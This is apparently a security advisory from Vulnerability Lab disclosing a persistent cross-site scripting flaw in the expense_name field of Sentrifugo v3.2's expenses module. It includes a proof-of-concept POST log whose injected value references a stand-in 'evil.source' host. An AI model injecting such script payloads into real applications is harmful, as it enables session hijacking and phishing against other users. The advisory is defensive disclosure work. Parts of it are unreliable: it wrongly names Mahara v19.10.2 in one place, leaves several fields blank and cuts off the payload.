Document Title:  
Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability  
References (Source):  
Release Date:  
Vulnerability Laboratory ID (VL-ID):  
Common Vulnerability Scoring System:  
Vulnerability Class:  
Cross Site Scripting - Persistent  
Current Estimated Price:  
1.000€ - 2.000€  
Product & Service Introduction:  
Sentrifugo is a FREE and powerful Human Resource Management System that  
can be easily configured to meet your organizational needs.  
Sentrifugo offers HR resource modules with exceptional features and an  
intuitive interface. It's easy to set up, configure and use.  
(Copy of the Homepage: & )  
Abstract Advisory Information:  
The vulnerability laboratory core research team discovered a persistent  
cross site scripting vulnerability in the Sentrifugo v3.2 CMS.  
Affected Product(s):  
Product: Sentrifugo v3.2 - CMS (Web-Application)  
Vulnerability Disclosure Timeline:  
2020-05-05: Public Disclosure (Vulnerability Laboratory)  
Discovery Status:  
Exploitation Technique:  
Severity Level:  
Authentication Type:  
Restricted authentication (user/moderator) - User privileges  
User Interaction:  
Low User Interaction  
Disclosure Type:  
Independent Security Research  
Technical Details & Description:  
A persistent input validation web vulnerability has been discovered in  
the official Mahara v19.10.2 CMS web-application series.  
The vulnerability allows remote attackers to inject own malicious script  
codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.  
The persistent vulnerability is located in the `expense_name` parameters  
of the `/expenses/expenses/edit` module in the `index.php` file.  
Remote attackers with low privileges are able to inject own malicious  
persistent script code as expenses entry. The injected code can  
be used to attack the frontend or backend of the web-application. The  
request method to inject is POST and the attack vector is located  
on the application-side. Entries of expenses can be reviewed in the  
backend by higher privileged accounts as well.  
Successful exploitation of the vulnerabilities results in session  
hijacking, persistent phishing attacks, persistent external redirects to  
malicious source and persistent manipulation of affected application  
Request Method(s):  
[+] POST  
Vulnerable Module(s):  
[+] index.php/expenses/expenses/edit  
Vulnerable Input(s):  
[+] Expenses Name  
Vulnerable File(s):  
[+] index.php  
Vulnerable Parameter(s):  
[+] expense_name  
Affected Module(s):  
[+] index.php/expenses/expenses  
Proof of Concept (PoC):  
The persistent web vulnerability can be exploited by low privileged web  
application user account with low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
PoC: Vulnerable Source  
<div id="maincontentdiv">   
<div id="dialog-confirm" style="display:none;">  
<div class="newframe-div">  
<div class="new-form-ui height32">  
<div class="division">  
<input type="text" maxlength="12" id="number_value"  
<span class="errors"  
<div id="empstatus-alert" style="display:none;">  
<div class="newframe-div"><div id="empstatusmessage"></div></div></div>  
<div id="empleaves-alert" style="display:none;">  
<div class="newframe-div"><div id="empleavesmessage"></div></div></div>   
--- PoC Session Logs [POST] --- (Expenses Inject)  
Host: sentrifugo.localhost:8080  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 352  
Origin: http://sentrifugo.localhost:8080  
Connection: keep-alive  
Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit  
Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;  
_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443  
expense_name=<img src="evil.source"  
POST: HTTP/1.1 200 OK  
Server: Apache/2.2.22 (Ubuntu)  
X-Powered-By: PHP/5.3.10-1ubuntu3.10  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 19284  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
Credits & Authors:  
Vulnerability-Lab -  
Benjamin Kunz Mejri -  
Disclaimer & Information:  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct,  
indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been  
advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or  
incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies,  
deface websites, hack into databases or trade with stolen data.  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers.  
All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the  
specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.  
Copyright © 2020 | Vulnerability Laboratory - [Evolution  
Security GmbH]™